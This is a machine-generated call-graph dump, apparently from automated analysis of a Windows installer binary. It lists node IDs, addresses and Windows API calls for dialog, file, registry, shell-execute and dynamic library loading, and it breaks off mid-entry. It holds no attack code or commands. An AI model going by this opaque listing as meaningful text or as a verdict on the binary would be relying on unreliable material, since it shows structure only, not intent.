4818->4830 4831 40510f 4818->4831 4848 40511f 4818->4848 4819->4818 4823 405038 4820->4823 4845 404fc5 4820->4845 4863 404c27 SendMessageA 4820->4863 4821->4813 4827 4042d4 18 API calls 4822->4827 4823->4817 4828 405091 SendMessageA 4823->4828 4850 404f49 4823->4850 4824 40502a SendMessageA 4824->4823 4825 40433b 8 API calls 4829 4052e5 4825->4829 4847 404e3e 4827->4847 4833 4050a6 SendMessageA 4828->4833 4828->4850 4830->4831 4834 405118 GlobalFree 4831->4834 4831->4848 4832 405299 4837 4052ab ShowWindow GetDlgItem ShowWindow 4832->4837 4832->4850 4836 4050b9 4833->4836 4834->4848 4835 404f18 GetWindowLongA SetWindowLongA 4838 404f31 4835->4838 4841 4050ca SendMessageA 4836->4841 4837->4850 4839 404f36 ShowWindow 4838->4839 4840 404f4e 4838->4840 4861 404309 SendMessageA 4839->4861 4862 404309 SendMessageA 4840->4862 4841->4817 4842 404f13 4842->4835 4842->4838 4845->4823 4845->4824 4846 404e90 SendMessageA 4846->4847 4847->4835 4847->4842 4847->4846 4851 404ee2 SendMessageA 4847->4851 4852 404ece SendMessageA 4847->4852 4848->4832 4856 40515a 4848->4856 4868 404ca7 4848->4868 4850->4825 4851->4847 4852->4847 4853 405264 4854 40526f InvalidateRect 4853->4854 4857 40527b 4853->4857 4854->4857 4855 405188 SendMessageA 4859 40519e 4855->4859 4856->4855 4856->4859 4857->4832 4877 404be2 4857->4877 4858 405212 SendMessageA SendMessageA 4858->4859 4859->4853 4859->4858 4861->4850 4862->4820 4864 404c86 SendMessageA 4863->4864 4865 404c4a GetMessagePos ScreenToClient SendMessageA 4863->4865 4866 404c7e 4864->4866 4865->4866 4867 404c83 4865->4867 4866->4845 4867->4864 4880 406257 lstrcpynA 4868->4880 4870 404cba 4881 4061b5 wsprintfA 4870->4881 4872 404cc4 4873 40140b 2 API calls 4872->4873 4874 404ccd 4873->4874 4882 406257 lstrcpynA 4874->4882 4876 404cd4 4876->4856 4883 404b1d 4877->4883 4879 404bf7 4879->4832 4880->4870 4881->4872 4882->4876 4884 404b33 4883->4884 4885 4062ea 17 API calls 4884->4885 4886 404b97 4885->4886 4887 4062ea 17 API calls 4886->4887 4888 404ba2 4887->4888 4889 4062ea 17 API calls 4888->4889 4890 404bb8 lstrlenA wsprintfA SetDlgItemTextA 4889->4890 4890->4879 4891 401959 4892 402c17 17 API calls 4891->4892 4893 401960 4892->4893 4894 402c17 17 API calls 4893->4894 4895 40196d 4894->4895 4896 402c39 17 API calls 4895->4896 4897 401984 lstrlenA 4896->4897 4899 401994 4897->4899 4898 4019d4 4899->4898 4903 406257 lstrcpynA 4899->4903 4901 4019c4 4901->4898 4902 4019c9 lstrlenA 4901->4902 4902->4898 4903->4901 4633 403dda 4634 403df2 4633->4634 4635 403f53 4633->4635 4634->4635 4638 403dfe 4634->4638 4636 403fa4 4635->4636 4637 403f64 GetDlgItem GetDlgItem 4635->4637 4640 403ffe 4636->4640 4652 401389 2 API calls 4636->4652 4639 4042d4 18 API calls 4637->4639 4641 403e09 SetWindowPos 4638->4641 4642 403e1c 4638->4642 4645 403f8e SetClassLongA 4639->4645 4646 404320 SendMessageA 4640->4646 4653 403f4e 4640->4653 4641->4642 4643 403e25 ShowWindow 4642->4643 4644 403e67 4642->4644 4647 403f40 4643->4647 4648 403e45 GetWindowLongA 4643->4648 4649 403e86 4644->4649 4650 403e6f DestroyWindow 4644->4650 4651 40140b 2 API calls 4645->4651 4675 404010 4646->4675 4659 40433b 8 API calls 4647->4659 4648->4647 4654 403e5e ShowWindow 4648->4654 4656 403e8b SetWindowLongA 4649->4656 4657 403e9c 4649->4657 4655 40425d 4650->4655 4651->4636 4658 403fd6 4652->4658 4654->4644 4655->4653 4664 40428e ShowWindow 4655->4664 4656->4653 4657->4647 4662 403ea8 GetDlgItem 4657->4662 4658->4640 4663 403fda SendMessageA 4658->4663 4659->4653 4660 40140b 2 API calls 4660->4675 4661 40425f DestroyWindow EndDialog 4661->4655 4665 403ed6 4662->4665 4666 403eb9 SendMessageA IsWindowEnabled 4662->4666 4663->4653 4664->4653 4668 403ee3 4665->4668 4669 403ef6 4665->4669 4670 403f2a SendMessageA 4665->4670 4679 403edb 4665->4679 4666->4653 4666->4665 4667 4062ea 17 API calls 4667->4675 4668->4670 4668->4679 4672 403f13 4669->4672 4673 403efe 4669->4673 4670->4647 4671 4042ad SendMessageA 4674 403f11 4671->4674 4677 40140b 2 API calls 4672->4677 4676 40140b 2 API calls 4673->4676 4674->4647 4675->4653 4675->4660 4675->4661 4675->4667 4678 4042d4 18 API calls 4675->4678 4681 4042d4 18 API calls 4675->4681 4697 40419f DestroyWindow 4675->4697 4676->4679 4680 403f1a 4677->4680 4678->4675 4679->4671 4680->4647 4680->4679 4682 40408b GetDlgItem 4681->4682 4683 4040a0 4682->4683 4684 4040a8 ShowWindow KiUserCallbackDispatcher 4682->4684 4683->4684 4706 4042f6 KiUserCallbackDispatcher 4684->4706 4686 4040d2 EnableWindow 4691 4040e6 4686->4691 4687 4040eb GetSystemMenu EnableMenuItem SendMessageA 4688 40411b SendMessageA 4687->4688 4687->4691 4688->4691 4690 403dbb 18 API calls 4690->4691 4691->4687 4691->4690 4707 404309 SendMessageA 4691->4707 4708 406257 lstrcpynA 4691->4708 4693 40414a lstrlenA 4694 4062ea 17 API calls 4693->4694 4695 40415b SetWindowTextA 4694->4695 4696 401389 2 API calls 4695->4696 4696->4675 4697->4655 4698 4041b9 CreateDialogParamA 4697->4698 4698->4655 4699 4041ec 4698->4699 4700 4042d4 18 API calls 4699->4700 4701 4041f7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4700->4701 4702 401389 2 API calls 4701->4702 4703 40423d 4702->4703 4703->4653 4704 404245 ShowWindow 4703->4704 4705 404320 SendMessageA 4704->4705 4705->4655 4706->4686 4707->4691 4708->4693 4904 401a5e 4905 402c17 17 API calls 4904->4905 4906 401a67 4905->4906 4907 402c17 17 API calls 4906->4907 4908 401a0e 4907->4908 3857 73c314e2 3858 73c312c6 GlobalAlloc 3857->3858 3859 73c314ef 3857->3859 3862 73c312af 3859->3862 3861 73c31502 3865 73c312c6 GlobalAlloc 3862->3865 3864 73c312be lstrcpynA 3864->3861 3865->3864 4909 401563 4910 402a42 4909->4910 4913 4061b5 wsprintfA 4910->4913 4912 402a47 4913->4912 4914 401b63 4915 402c39 17 API calls 4914->4915 4916 401b6a 4915->4916 4917 402c17 17 API calls 4916->4917 4918 401b73 wsprintfA 4917->4918 4919 402ac5 4918->4919 4920 401d65 4921 401d78 GetDlgItem 4920->4921 4922 401d6b 4920->4922 4924 401d72 4921->4924 4923 402c17 17 API calls 4922->4923 4923->4924 4925 402c39 17 API calls 4924->4925 4927 401db9 GetClientRect LoadImageA SendMessageA 4924->4927 4925->4927 4928 401e1a 4927->4928 4930 401e26 4927->4930 4929 401e1f DeleteObject 4928->4929 4928->4930 4929->4930 4931 404766 4932 404792 4931->4932 4933 4047a3 4931->4933 4992 405951 GetDlgItemTextA 4932->4992 4934 4047af GetDlgItem 4933->4934 4941 40480e 4933->4941 4936 4047c3 4934->4936 4940 4047d7 SetWindowTextA 4936->4940 4944 405c82 4 API calls 4936->4944 4937 4048f2 4990 404a9c 4937->4990 4994 405951 GetDlgItemTextA 4937->4994 4938 40479d 4939 406535 5 API calls 4938->4939 4939->4933 4945 4042d4 18 API calls 4940->4945 4941->4937 4946 4062ea 17 API calls 4941->4946 4941->4990 4943 40433b 8 API calls 4948 404ab0 4943->4948 4949 4047cd 4944->4949 4950 4047f3 4945->4950 4951 404882 SHBrowseForFolderA 4946->4951 4947 404922 4952 405cd7 18 API calls 4947->4952 4949->4940 4956 405be9 3 API calls 4949->4956 4953 4042d4 18 API calls 4950->4953 4951->4937 4954 40489a CoTaskMemFree 4951->4954 4955 404928 4952->4955 4957 404801 4953->4957 4958 405be9 3 API calls 4954->4958 4995 406257 lstrcpynA 4955->4995 4956->4940 4993 404309 SendMessageA 4957->4993 4960 4048a7 4958->4960 4963 4048de SetDlgItemTextA 4960->4963 4967 4062ea 17 API calls 4960->4967 4962 404807 4966 406663 5 API calls 4962->4966 4963->4937 4964 40493f 4965 406663 5 API calls 4964->4965 4973 404946 4965->4973 4966->4941 4968 4048c6 lstrcmpiA 4967->4968 4968->4963 4970 4048d7 lstrcatA 4968->4970 4969 404982 4996 406257 lstrcpynA 4969->4996 4970->4963 4972 404989 4974 405c82 4 API calls 4972->4974 4973->4969 4978 405c30 2 API calls 4973->4978 4979 4049da 4973->4979 4975 40498f GetDiskFreeSpaceA 4974->4975 4977 4049b3 MulDiv 4975->4977 4975->4979 4977->4979 4978->4973 4980 404be2 20 API calls 4979->4980 4989 404a4b 4979->4989 4983 404a38 4980->4983 4981 40140b 2 API calls 4982 404a6e 4981->4982 4997 4042f6 KiUserCallbackDispatcher 4982->4997 4984 404a4d SetDlgItemTextA 4983->4984 4985 404a3d 4983->4985 4984->4989 4987 404b1d 20 API calls 4985->4987 4987->4989 4988 404a8a 4988->4990 4998 4046bf 4988->4998 4989->4981 4989->4982 4990->4943 4992->4938 4993->4962 4994->4947 4995->4964 4996->4972 4997->4988 4999 4046d2 SendMessageA 4998->4999 5000 4046cd 4998->5000 4999->4990 5000->4999 5001 402766 5002 40276c 5001->5002 5003 402774 FindClose 5002->5003 5004 402ac5 5002->5004 5003->5004 5005 4023e8 5006 402c39 17 API calls 5005->5006 5007 4023f9 5006->5007 5008 402c39 17 API calls 5007->5008 5009 402402 5008->5009 5010 402c39 17 API calls 5009->5010 5011 40240c GetPrivateProfileStringA 5010->5011 5012 4027e8 5013 402c39 17 API calls 5012->5013 5014 4027f4 5013->5014 5015 40280a 5014->5015 5016 402c39 17 API calls 5014->5016 5017 405dc5 2 API calls 5015->5017 5016->5015 5018 402810 5017->5018 5040 405dea GetFileAttributesA CreateFileA 5018->5040 5020 40281d 5021 4028d9 5020->5021 5024 4028c1 5020->5024 5025 402838 GlobalAlloc 5020->5025 5022 4028e0 DeleteFileA 5021->5022 5023 4028f3 5021->5023 5022->5023 5026 403143 31 API calls 5024->5026 5025->5024 5027 402851 5025->5027 5029 4028ce CloseHandle 5026->5029 5041 40336b SetFilePointer 5027->5041 5029->5021 5030 402857 5031 403355 ReadFile 5030->5031 5032 402860 GlobalAlloc 5031->5032 5033 402870 5032->5033 5034 4028aa 5032->5034 5035 403143 31 API calls 5033->5035 5036 405e91 WriteFile 5034->5036 5039 40287d 5035->5039 5037 4028b6 GlobalFree 5036->5037 5037->5024 5038 4028a1 GlobalFree 5038->5034 5039->5038 5040->5020 5041->5030 5042 40166a 5043 402c39 17 API calls 5042->5043 5044 401671 5043->5044 5045 402c39 17 API calls 5044->5045 5046 40167a 5045->5046 5047 402c39 17 API calls 5046->5047 5048 401683 MoveFileA 5047->5048 5049 401696 5048->5049 5055 40168f 5048->5055 5050 4065ce 2 API calls 5049->5050 5053 4022ea 5049->5053 5052 4016a5 5050->5052 5051 401423 24 API calls 5051->5053 5052->5053 5054 406030 36 API calls 5052->5054 5054->5055 5055->5051 5056 4052ec 5057 405310 5056->5057 5058 4052fc 5056->5058 5060 40532f 5057->5060 5061 405318 IsWindowVisible 5057->5061 5059 405302 5058->5059 5068 405359 5058->5068 5063 404320 SendMessageA 5059->5063 5062 40535e CallWindowProcA 5060->5062 5067 404ca7 4 API calls 5060->5067 5064 405325 5061->5064 5061->5068 5065 40530c 5062->5065 5063->5065 5066 404c27 5 API calls 5064->5066 5066->5060 5067->5068 5068->5062 5069 73c32d6f 5070 73c32d87 5069->5070 5071 73c312d5 2 API calls 5070->5071 5072 73c32da2 5071->5072 5073 4019ed 5074 402c39 17 API calls 5073->5074 5075 4019f4 5074->5075 5076 402c39 17 API calls 5075->5076 5077 4019fd 5076->5077 5078 401a04 lstrcmpiA 5077->5078 5079 401a16 lstrcmpA 5077->5079 5080 401a0a 5078->5080 5079->5080 5081 40156f 5082 401586 5081->5082 5083 40157f ShowWindow 5081->5083 5084 401594 ShowWindow 5082->5084 5085 402ac5 5082->5085 5083->5082 5084->5085 5086 4022f3 5087 402c39 17 API calls 5086->5087 5088 4022f9 5087->5088 5089 402c39 17 API calls 5088->5089 5090 402302 5089->5090 5091 402c39 17 API calls 5090->5091 5092 40230b 5091->5092 5093 4065ce 2 API calls 5092->5093 5094 402314 5093->5094 5095 402325 lstrlenA lstrlenA 5094->5095 5096 402318 5094->5096 5098 405378 24 API calls 5095->5098 5097 405378 24 API calls 5096->5097 5100 402320 5096->5100 5097->5100 5099 402361 SHFileOperationA 5098->5099 5099->5096 5099->5100 5101 402173 5102 402c39 17 API calls 5101->5102 5103 40217a 5102->5103 5104 402c39 17 API calls 5103->5104 5105 402184 5104->5105 5106 402c39 17 API calls 5105->5106 5107 40218e 5106->5107 5108 402c39 17 API calls 5107->5108 5109 40219b 5108->5109 5110 402c39 17 API calls 5109->5110 5111 4021a5 5110->5111 5112 4021e7 CoCreateInstance 5111->5112 5113 402c39 17 API calls 5111->5113 5116 402206 5112->5116 5118 4022b4 5112->5118 5113->5112 5114 401423 24 API calls 5115 4022ea 5114->5115 5117 402294 MultiByteToWideChar 5116->5117 5116->5118 5117->5118 5118->5114 5118->5115 5119 4014f4 SetForegroundWindow 5120 402ac5 5119->5120 5121 402675 5122 402c17 17 API calls 5121->5122 5123 40267f 5122->5123 5124 405e62 ReadFile 5123->5124 5125 4026ef 5123->5125 5126 4026ff 5123->5126 5129 4026ed 5123->5129 5124->5123 5130 4061b5 wsprintfA 5125->5130 5128 402715 SetFilePointer 5126->5128 5126->5129 5128->5129 5130->5129 5131 402375 5132 40237c 5131->5132 5135 40238f 5131->5135 5133 4062ea 17 API calls 5132->5133 5134 402389 5133->5134 5134->5135 5136 40596d MessageBoxIndirectA 5134->5136 5136->5135 5137 4029f6 5138 402a49 5137->5138 5139 4029fd 5137->5139 5140 406663 5 API calls 5138->5140 5142 402c17 17 API calls 5139->5142 5145 402a47 5139->5145 5141 402a50 5140->5141 5143 402c39 17 API calls 5141->5143 5144 402a0b 5142->5144 5146 402a59 5143->5146 5147 402c17 17 API calls 5144->5147 5146->5145 5155 4062aa 5146->5155 5149 402a1a 5147->5149 5154 4061b5 wsprintfA 5149->5154 5150 402a67 5150->5145 5159 406294 5150->5159 5154->5145 5157 4062b5 5155->5157 5156 4062d8 IIDFromString 5156->5150 5157->5156 5158 4062d1 5157->5158 5158->5150 5162 406279 WideCharToMultiByte 5159->5162 5161 402a88 CoTaskMemFree 5161->5145 5162->5161 5163 401ef9 5164 402c39 17 API calls 5163->5164 5165 401eff 5164->5165 5166 402c39 17 API calls 5165->5166 5167 401f08 5166->5167 5168 402c39 17 API calls 5167->5168 5169 401f11 5168->5169 5170 402c39 17 API calls 5169->5170 5171 401f1a 5170->5171 5172 401423 24 API calls 5171->5172 5173 401f21 5172->5173 5180 405933 ShellExecuteExA 5173->5180 5175 401f5c 5177 4027c8 5175->5177 5181 4066d8 WaitForSingleObject 5175->5181 5178 401f76 CloseHandle 5178->5177 5180->5175 5182 4066f2 5181->5182 5183 406704 GetExitCodeProcess 5182->5183 5184 40669f 2 API calls 5182->5184 5183->5178 5185 4066f9 WaitForSingleObject 5184->5185 5185->5182 5186 401f7b 5187 402c39 17 API calls 5186->5187 5188 401f81 5187->5188 5189 405378 24 API calls 5188->5189 5190 401f8b 5189->5190 5191 4058f0 2 API calls 5190->5191 5192 401f91 5191->5192 5193 401fb2 CloseHandle 5192->5193 5195 4027c8 5192->5195 5196 4066d8 5 API calls 5192->5196 5193->5195 5197 401fa6 5196->5197 5197->5193 5199 4061b5 wsprintfA 5197->5199 5199->5193 5200 401ffb 5201 402c39 17 API calls 5200->5201 5202 402002 5201->5202 5203 406663 5 API calls 5202->5203 5204 402011 5203->5204 5205 402029 GlobalAlloc 5204->5205 5208 402099 5204->5208 5206 40203d 5205->5206 5205->5208 5207 406663 5 API calls 5206->5207 5209 402044 5207->5209 5210 406663 5 API calls 5209->5210 5211 40204e 5210->5211 5211->5208 5215 4061b5 wsprintfA 5211->5215 5213 402089 5216 4061b5 wsprintfA 5213->5216 5215->5213 5216->5208 5217 4039fb 5218 403a06 5217->5218 5219 403a0a 5218->5219 5220 403a0d GlobalAlloc 5218->5220 5220->5219 5221 4018fd 5222 401934 5221->5222 5223 402c39 17 API calls 5222->5223 5224 401939 5223->5224 5225 405a19 67 API calls 5224->5225 5226 401942 5225->5226 4733 40247e 4734 402c39 17 API calls 4733->4734 4735 402490 4734->4735 4736 402c39 17 API calls 4735->4736 4737 40249a 4736->4737 4750 402cc9 4737->4750 4740 402ac5 4741 4024cf 4744 402c17 17 API calls 4741->4744 4746 4024db 4741->4746 4742 402c39 17 API calls 4743 4024c8 lstrlenA 4742->4743 4743->4741 4744->4746 4745 4024fd RegSetValueExA 4748 402513 RegCloseKey 4745->4748 4746->4745 4747 403143 31 API calls 4746->4747 4747->4745 4748->4740 4751 402ce4 4750->4751 4754 40610b 4751->4754 4755 40611a 4754->4755 4756 4024aa 4755->4756 4757 406125 RegCreateKeyExA 4755->4757 4756->4740 4756->4741 4756->4742 4757->4756 5227 401cfe 5228 402c17 17 API calls 5227->5228 5229 401d04 IsWindow 5228->5229 5230 401a0e 5229->5230 5231 401000 5232 401037 BeginPaint GetClientRect 5231->5232 5233 40100c DefWindowProcA 5231->5233 5235 4010f3 5232->5235 5236 401179 5233->5236 5237 401073 CreateBrushIndirect FillRect DeleteObject 5235->5237 5238 4010fc 5235->5238 5237->5235 5239 401102 CreateFontIndirectA 5238->5239 5240 401167 EndPaint 5238->5240 5239->5240 5241 401112 6 API calls 5239->5241 5240->5236 5241->5240 5242 401900 5243 402c39 17 API calls 5242->5243 5244 401907 5243->5244 5245 40596d MessageBoxIndirectA 5244->5245 5246 401910 5245->5246 5247 402780 5248 402786 5247->5248 5249 40278a FindNextFileA 5248->5249 5252 40279c 5248->5252 5250 4027db 5249->5250 5249->5252 5253 406257 lstrcpynA 5250->5253 5253->5252 5254 401502 5255 40150a 5254->5255 5257 40151d 5254->5257 5256 402c17 17 API calls 5255->5256 5256->5257 5258 73c31000 5261 73c3101b 5258->5261 5268 73c31504 5261->5268 5263 73c31020 5264 73c31032 5263->5264 5265 73c31024 GlobalAlloc 5263->5265 5272 73c31558 wsprintfA 5264->5272 5265->5264 5269 73c3150a 5268->5269 5270 73c31510 5269->5270 5271 73c3151c GlobalFree 5269->5271 5270->5263 5271->5263 5273 73c3157e 2 API calls 5272->5273 5274 73c31019 5273->5274 5275 73c31a87 5276 73c31ab5 5275->5276 5299 73c32288 5276->5299 5278 73c31abc 5279 73c31ac3 5278->5279 5280 73c31acf 5278->5280 5281 73c3157e 2 API calls 5279->5281 5282 73c31af0 5280->5282 5283 73c31ad9 5280->5283 5286 73c31acd 5281->5286 5284 73c31af6 5282->5284 5285 73c31b1c 5282->5285 5287 73c31558 3 API calls 5283->5287 5288 73c315f4 3 API calls 5284->5288 5289 73c31558 3 API calls 5285->5289 5290 73c31ade 5287->5290 5292 73c31afb 5288->5292 5289->5286 5330 73c315f4 5290->5330 5294 73c3157e 2 API calls 5292->5294 5296 73c31b01 GlobalFree 5294->5296 5295 73c3157e 2 API calls 5297 73c31aea GlobalFree 5295->5297 5296->5286 5296->5297 5335 73c312c6 GlobalAlloc 5299->5335 5301 73c322b4 5336 73c312c6 GlobalAlloc 5301->5336 5303 73c328f7 GlobalFree GlobalFree GlobalFree 5304 73c32917 5303->5304 5316 73c32965 5303->5316 5307 73c329b5 5304->5307 5314 73c32930 5304->5314 5304->5316 5305 73c322bf 5305->5303 5306 73c32814 GlobalAlloc 5305->5306 5311 73c32866 lstrcpyA 5305->5311 5312 73c32884 GlobalFree 5305->5312 5315 73c32871 lstrcpyA 5305->5315 5324 73c328c2 5305->5324 5325 73c32718 GlobalFree 5305->5325 5326 73c312af 2 API calls 5305->5326 5328 73c327b8 lstrcpyA 5305->5328 5337 73c312c6 GlobalAlloc 5305->5337 5306->5305 5308 73c329d6 GetModuleHandleA 5307->5308 5307->5316 5309 73c329e7 LoadLibraryA 5308->5309 5310 73c329fc 5308->5310 5309->5310 5309->5316 5338 73c31ece GetProcAddress 5310->5338 5311->5315 5312->5305 5314->5316 5320 73c312af 2 API calls 5314->5320 5315->5305 5316->5278 5317 73c32a09 5318 73c32a48 5317->5318 5329 73c32a32 GetProcAddress 5317->5329 5318->5316 5319 73c32a56 lstrlenA 5318->5319 5339 73c31ece GetProcAddress 5319->5339 5320->5316 5323 73c32a70 5323->5316 5324->5305 5327 73c312d5 2 API calls 5324->5327 5325->5305 5326->5305 5327->5324 5328->5305 5329->5318 5340 73c312c6 GlobalAlloc 5330->5340 5332 73c315f9 5341 73c31e71 5332->5341 5335->5301 5336->5305 5337->5305 5338->5317 5339->5323 5340->5332 5342 73c31eaf lstrcpyA 5341->5342 5343 73c31e7e wsprintfA 5341->5343 5345 73c31603 5342->5345 5343->5345 5345->5295 5346 73c31606 5347 73c31637 5346->5347 5348 73c32288 18 API calls 5347->5348 5349 73c3163e 5348->5349 5350 73c3176f 5349->5350 5351 73c31655 5349->5351 5385 73c31edd 5349->5385 5389 73c31f58 5351->5389 5354 73c3165c 5357 73c3166b 5354->5357 5362 73c3168a 5354->5362 5374 73c31680 5354->5374 5355 73c316a2 5411 73c32128 5355->5411 5356 73c316c0 5360 73c31711 5356->5360 5361 73c316c6 5356->5361 5359 73c31675 5357->5359 5364 73c31682 5357->5364 5359->5374 5398 73c32bc4 5359->5398 5368 73c32128 11 API calls 5360->5368 5366 73c31e71 2 API calls 5361->5366 5362->5374 5408 73c32e4f 5362->5408 5363 73c316a8 5369 73c315f4 3 API calls 5363->5369 5402 73c31774 5364->5402 5371 73c316e5 5366->5371 5372 73c316fe 5368->5372 5373 73c316ae 5369->5373 5375 73c32128 11 API calls 5371->5375 5376 73c3175e 5372->5376 5422 73c31f1f 5372->5422 5377 73c3157e 2 API calls 5373->5377 5374->5355 5374->5356 5375->5372 5376->5350 5380 73c31768 GlobalFree 5376->5380 5379 73c316b4 GlobalFree 5377->5379 5379->5372 5380->5350 5382 73c3174f 5382->5376 5384 73c31558 3 API calls 5382->5384 5383 73c31742 FreeLibrary 5383->5382 5384->5376 5386 73c31ef0 5385->5386 5387 73c31f1c 5386->5387 5388 73c31efb GlobalAlloc 5386->5388 5387->5351 5388->5386 5395 73c31f6d 5389->5395 5390 73c312af lstrcpynA GlobalAlloc 5390->5395 5391 73c314e2 3 API calls 5391->5395 5392 73c320dc GlobalFree 5394 73c32100 5392->5394 5392->5395 5393 73c32038 GlobalAlloc MultiByteToWideChar 5393->5395 5396 73c32067 GlobalAlloc CLSIDFromString GlobalFree 5393->5396 5394->5354 5395->5390 5395->5391 5395->5392 5395->5393 5426 73c31958 5395->5426 5396->5392 5401 73c32bd6 5398->5401 5429 73c32b72 5401->5429 5406 73c317a0 5402->5406 5403 73c31825 5405 73c31829 GlobalSize 5403->5405 5407 73c31832 5403->5407 5404 73c31814 GlobalAlloc 5404->5407 5405->5407 5406->5403 5406->5404 5407->5374 5409 73c32e5a 5408->5409 5410 73c32e9a GlobalFree 5409->5410 5432 73c312c6 GlobalAlloc 5411->5432 5413 73c321b0 StringFromGUID2 WideCharToMultiByte 5419 73c32136 5413->5419 5414 73c321d8 WideCharToMultiByte 5414->5419 5415 73c3219f lstrcpynA 5415->5419 5416 73c32202 wsprintfA 5416->5419 5417 73c32225 GlobalFree 5417->5419 5418 73c3225c GlobalFree 5418->5363 5419->5413 5419->5414 5419->5415 5419->5416 5419->5417 5419->5418 5420 73c3157e 2 API calls 5419->5420 5421 73c315c7 lstrcpyA 5419->5421 5420->5419 5421->5419 5423 73c31f2e 5422->5423 5425 73c31724 5422->5425 5424 73c31f42 GlobalFree 5423->5424 5423->5425 5424->5423 5425->5382 5425->5383 5427 73c31967 VirtualAlloc 5426->5427 5428 73c319c5 5426->5428 5427->5428 5428->5395 5430 73c32b80 GetLastError 5429->5430 5431 73c32b8b 5429->5431 5430->5431 5431->5374 5432->5419 3980 401b87 3981 401b94 3980->3981 3982 401bd8 3980->3982 3983 401c1c 3981->3983 3988 401bab 3981->3988 3984 401c01 GlobalAlloc 3982->3984 3985 401bdc 3982->3985 3986 4062ea 17 API calls 3983->3986 3994 40238f 3983->3994 3987 4062ea 17 API calls 3984->3987 3985->3994 4001 406257 lstrcpynA 3985->4001 3990 402389 3986->3990 3987->3983 3999 406257 lstrcpynA 3988->3999 3990->3994 4002 40596d 3990->4002 3992 401bee GlobalFree 3992->3994 3993 401bba 4000 406257 lstrcpynA 3993->4000 3997 401bc9 4006 406257 lstrcpynA 3997->4006 3999->3993 4000->3997 4001->3992 4003 405982 4002->4003 4004 405996 MessageBoxIndirectA 4003->4004 4005 4059ce 4003->4005 4004->4005 4005->3994 4006->3994 5433 40440a lstrcpynA lstrlenA 5434 40298a 5435 402c17 17 API calls 5434->5435 5436 402990 5435->5436 5437 4062ea 17 API calls 5436->5437 5438 4027c8 5436->5438 5437->5438 4052 73c32288 4083 73c312c6 GlobalAlloc 4052->4083 4054 73c322b4 4084 73c312c6 GlobalAlloc 4054->4084 4056 73c328f7 GlobalFree GlobalFree GlobalFree 4057 73c32917 4056->4057 4069 73c32965 4056->4069 4060 73c329b5 4057->4060 4067 73c32930 4057->4067 4057->4069 4058 73c322bf 4058->4056 4059 73c32814 GlobalAlloc 4058->4059 4064 73c32866 lstrcpyA 4058->4064 4065 73c32884 GlobalFree 4058->4065 4068 73c32871 lstrcpyA 4058->4068 4077 73c328c2 4058->4077 4078 73c32718 GlobalFree 4058->4078 4079 73c312af 2 API calls 4058->4079 4081 73c327b8 lstrcpyA 4058->4081 4085 73c312c6 GlobalAlloc 4058->4085 4059->4058 4061 73c329d6 GetModuleHandleA 4060->4061 4060->4069 4062 73c329e7 LoadLibraryA 4061->4062 4063 73c329fc 4061->4063 4062->4063 4062->4069 4088 73c31ece GetProcAddress 4063->4088 4064->4068 4065->4058 4067->4069 4073 73c312af 2 API calls 4067->4073 4068->4058 4070 73c32a09 4071 73c32a48 4070->4071 4082 73c32a32 GetProcAddress 4070->4082 4071->4069 4072 73c32a56 lstrlenA 4071->4072 4089 73c31ece GetProcAddress 4072->4089 4073->4069 4076 73c32a70 4076->4069 4077->4058 4086 73c312d5 GlobalSize GlobalAlloc 4077->4086 4078->4058 4079->4058 4081->4058 4082->4071 4083->4054 4084->4058 4085->4058 4087 73c312f3 4086->4087 4087->4077 4088->4070 4089->4076 5439 40260c 5440 402c39 17 API calls 5439->5440 5441 402613 5440->5441 5444 405dea GetFileAttributesA CreateFileA 5441->5444 5443 40261f 5444->5443 5445 401490 5446 405378 24 API calls 5445->5446 5447 401497 5446->5447 5448 402590 5449 402c79 17 API calls 5448->5449 5450 40259a 5449->5450 5451 402c17 17 API calls 5450->5451 5452 4025a3 5451->5452 5453 4025ca RegEnumValueA 5452->5453 5454 4025be RegEnumKeyA 5452->5454 5456 4027c8 5452->5456 5455 4025df RegCloseKey 5453->5455 5454->5455 5455->5456 4729 40159d 4730 402c39 17 API calls 4729->4730 4731 4015a4 SetFileAttributesA 4730->4731 4732 4015b6 4731->4732 5458 40149d 5459 4014ab PostQuitMessage 5458->5459 5460 40238f 5458->5460 5459->5460 4758 401a1e 4759 402c39 17 API calls 4758->4759 4760 401a27 ExpandEnvironmentStringsA 4759->4760 4761 401a3b 4760->4761 4763 401a4e 4760->4763 4762 401a40 lstrcmpA 4761->4762 4761->4763 4762->4763 5466 40251e 5467 402c79 17 API calls 5466->5467 5468 402528 5467->5468 5469 402c39 17 API calls 5468->5469 5470 402531 5469->5470 5471 40253b RegQueryValueExA 5470->5471 5476 4027c8 5470->5476 5472 402561 RegCloseKey 5471->5472 5473 40255b 5471->5473 5472->5476 5473->5472 5477 4061b5 wsprintfA 5473->5477 5477->5472 5478 40471f 5479 404755 5478->5479 5480 40472f 5478->5480 5482 40433b 8 API calls 5479->5482 5481 4042d4 18 API calls 5480->5481 5483 40473c SetDlgItemTextA 5481->5483 5484 404761 5482->5484 5483->5479 5485 40171f 5486 402c39 17 API calls 5485->5486 5487 401726 SearchPathA 5486->5487 5488 401741 5487->5488 5489 401d1f 5490 402c17 17 API calls 5489->5490 5491 401d26 5490->5491 5492 402c17 17 API calls 5491->5492 5493 401d32 GetDlgItem 5492->5493 5494 402628 5493->5494 5495 402aa0 SendMessageA 5496 402ac5 5495->5496 5497 402aba InvalidateRect 5495->5497 5497->5496 3869 4023a4 3870 4023b2 3869->3870 3871 4023ac 3869->3871 3873 402c39 17 API calls 3870->3873 3875 4023c2 3870->3875 3872 402c39 17 API calls 3871->3872 3872->3870 3873->3875 3876 402c39 17 API calls 3875->3876 3877 4023d0 3875->3877 3876->3877 3879 402c39 3877->3879 3880 402c45 3879->3880 3885 4062ea 3880->3885 3883 4023d9 WritePrivateProfileStringA 3889 4062f7 3885->3889 3886 40651c 3887 402c66 3886->3887 3918 406257 lstrcpynA 3886->3918 3887->3883 3902 406535 3887->3902 3889->3886 3890 4064f6 lstrlenA 3889->3890 3892 4062ea 10 API calls 3889->3892 3895 406412 GetSystemDirectoryA 3889->3895 3896 406425 GetWindowsDirectoryA 3889->3896 3897 406535 5 API calls 3889->3897 3898 4062ea 10 API calls 3889->3898 3899 40649f lstrcatA 3889->3899 3900 406459 SHGetSpecialFolderLocation 3889->3900 3911 40613e 3889->3911 3916 4061b5 wsprintfA 3889->3916 3917 406257 lstrcpynA 3889->3917 3890->3889 3892->3890 3895->3889 3896->3889 3897->3889 3898->3889 3899->3889 3900->3889 3901 406471 SHGetPathFromIDListA CoTaskMemFree 3900->3901 3901->3889 3909 406541 3902->3909 3903 4065a9 3904 4065ad CharPrevA 3903->3904 3906 